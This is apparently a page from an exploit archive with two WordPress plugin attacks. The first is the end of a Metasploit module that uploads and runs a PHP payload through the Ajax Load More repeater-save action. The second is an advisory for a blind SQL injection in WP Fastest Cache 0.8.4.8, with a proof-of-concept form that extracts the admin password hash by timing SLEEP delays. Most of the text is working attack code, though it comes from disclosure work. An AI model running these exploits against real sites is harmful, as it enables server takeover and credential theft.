    vprint_status("#{peer} - Trying to upload payload")
 
    # This must be default.php
    filename = 'default.php'
 
    print_status("#{peer} - Uploading payload")
    res = send_request_cgi(
      'method'      => 'POST',
      'uri'         => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
      'vars_post'   => {
        'action'    => 'alm_save_repeater',
        'value'     => payload.encoded,
        'repeater'  => 'default',
        'type'      => 'default',
        'alias'     => '',
        'nonce'     => nonce
      },
      'cookie'      => cookie
    )
 
    if res
      if res.code == 200 && res.body.include?('Template Saved Successfully')
        register_files_for_cleanup(filename)
      else
        fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end
 
    print_status("#{peer} - Calling uploaded file")
    send_request_cgi(
      'uri'    => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
    )
  end
end

(806)

13Nov/150

WP Fastest Cache 0.8.4.8 Blind SQL Injection

# Exploit Title: WP Fastest Cache 0.8.4.8 Blind SQL Injection
# Date: 11-11-2015
# Software Link: https://wordpress.org/plugins/wp-fastest-cache/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
 
1. Description
 
For this vulnerabilities also WP-Polls needs to be installed.
 
Everyone can access wpfc_wppolls_ajax_request().
 
$_POST["poll_id"] is not escaped properly.
 
File: wp-fastest-cache\inc\wp-polls.php
 
public function wpfc_wppolls_ajax_request() {
  $id = strip_tags($_POST["poll_id"]);
  $id = mysql_real_escape_string($id);
 
  $result = check_voted($id);
 
  if($result){
    echo "true";
  }else{
    echo "false";
  }
  die();
}
 
http://security.szurek.pl/wp-fastest-cache-0848-blind-sql-injection.html
 
2. Proof of Concept
 
<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wpfc_wppolls_ajax_request">
  <input type="text" name="poll_id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1) -- ">
  <input type="submit" value="Send">
</form>
 
3. Solution:
 
Update to version 0.8.4.9

(583)